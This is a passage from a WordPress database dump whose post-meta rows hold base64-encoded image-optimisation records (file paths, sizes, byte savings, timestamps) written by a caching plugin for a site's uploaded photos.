cHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NTMtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc0NzQsImlkIjozNzF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NTMtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NTMtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NTMtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjY5LCJ0aW1lIjoxNDgzNTg3NDc2LCJpZCI6MzcxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTUzLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTUzLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTUzLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3NDc5LCJpZCI6MzcxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTUzLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTUzLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTUzLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3NDgxLCJpZCI6MzcxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTUzLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTUzLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTUzLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3NDg0LCJpZCI6MzcxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTUzLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTUzLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTUzLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3NDg3LCJpZCI6MzcxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTUzLTYwMHg2MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTUzLTYwMHg2MDAuanBnIiwid2lkdGgiOiI2MDAiLCJoZWlnaHQiOiI2MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTUzLTYwMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3NDkwLCJpZCI6MzcxfV0='); 
INSERT INTO `wp_postmeta` VALUES (30237, 370, 'wpfc_optimisation_reduction', '1157309'); 
INSERT INTO `wp_postmeta` VALUES (30238, 370, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTQwLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTQwLmpwZyIsIndpZHRoIjo1MzEyLCJoZWlnaHQiOjI5ODgsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NDAuanBnIiwicmVkdWN0aW9uIjoxMTU3Mjg2LCJ0aW1lIjoxNDgzNTg3NTAyLCJpZCI6IjM3MCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTQwLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTQwLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTQwLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3NTA0LCJpZCI6MzcwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIwMTYwODEyXzEwNDk0MC04MDB4NDUwLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NDUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIwMTYwODEyXzEwNDk0MC04MDB4NDUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzIwMTYwODEyXzEwNDk0MC04MDB4NDUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzUwOCwiaWQiOjM3MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NDAtNzY4eDQzMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjQzMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NDAtNzY4eDQzMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NDAtNzY4eDQzMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc1MTAsImlkIjozNzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTQwLTE2MDB4OTAwLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjkwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NDAtMTYwMHg5MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTQwLTE2MDB4OTAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzUxNCwiaWQiOjM3MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NDAtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NDAtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NDAtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc1MTcsImlkIjozNzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTQwLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTQwLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTQwLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3NTE5LCJpZCI6MzcwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIwMTYwODEyXzEwNDk0MC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIwMTYwODEyXzEwNDk0MC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzIwMTYwODEyXzEwNDk0MC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzUyMiwiaWQiOjM3MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NDAtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NDAtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NDAtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc1MjUsImlkIjozNzB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NDAtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NDAtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NDAtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEwLCJ0aW1lIjoxNDgzNTg3NTI3LCJpZCI6MzcwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTQwLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTQwLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTQwLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3NTMwLCJpZCI6MzcwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTQwLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTQwLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTQwLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3NTMyLCJpZCI6MzcwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTQwLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTQwLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTQwLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3NTM1LCJpZCI6MzcwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTQwLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTQwLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTQwLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3NTM4LCJpZCI6MzcwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTQwLTYwMHg2MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTQwLTYwMHg2MDAuanBnIiwid2lkdGgiOiI2MDAiLCJoZWlnaHQiOiI2MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTQwLTYwMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3NTQxLCJpZCI6MzcwfV0='); 
INSERT INTO `wp_postmeta` VALUES (30239, 369, 'wpfc_optimisation_reduction', '168685'); 
INSERT INTO `wp_postmeta` VALUES (30240, 369, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTI3LWUxNDcxNTIzODg0NzI4LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTI3LWUxNDcxNTIzODg0NzI4LmpwZyIsIndpZHRoIjoyOTg4LCJoZWlnaHQiOjUzMTEsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5MjctZTE0NzE1MjM4ODQ3MjguanBnIiwicmVkdWN0aW9uIjoxNjg2MDAsInRpbWUiOjE0ODM1ODc1NTIsImlkIjoiMzY5In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5MjctZTE0NzE1MjM4ODQ3MjgtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5MjctZTE0NzE1MjM4ODQ3MjgtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5MjctZTE0NzE1MjM4ODQ3MjgtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc1NTUsImlkIjozNjl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTI3LWUxNDcxNTIzODg0NzI4LTQ1MHg4MDAuanBnIiwid2lkdGgiOjQ1MCwiaGVpZ2h0Ijo4MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTI3LWUxNDcxNTIzODg0NzI4LTQ1MHg4MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTI3LWUxNDcxNTIzODg0NzI4LTQ1MHg4MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3NTU3LCJpZCI6MzY5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIwMTYwODEyXzEwNDkyNy1lMTQ3MTUyMzg4NDcyOC03Njh4MTM2NS5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjEzNjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTI3LWUxNDcxNTIzODg0NzI4LTc2OHgxMzY1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzIwMTYwODEyXzEwNDkyNy1lMTQ3MTUyMzg4NDcyOC03Njh4MTM2NS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc1NjEsImlkIjozNjl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTI3LWUxNDcxNTIzODg0NzI4LTkwMHgxNjAwLmpwZyIsIndpZHRoIjo5MDAsImhlaWdodCI6MTYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5MjctZTE0NzE1MjM4ODQ3MjgtOTAweDE2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTI3LWUxNDcxNTIzODg0NzI4LTkwMHgxNjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzU2NSwiaWQiOjM2OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMD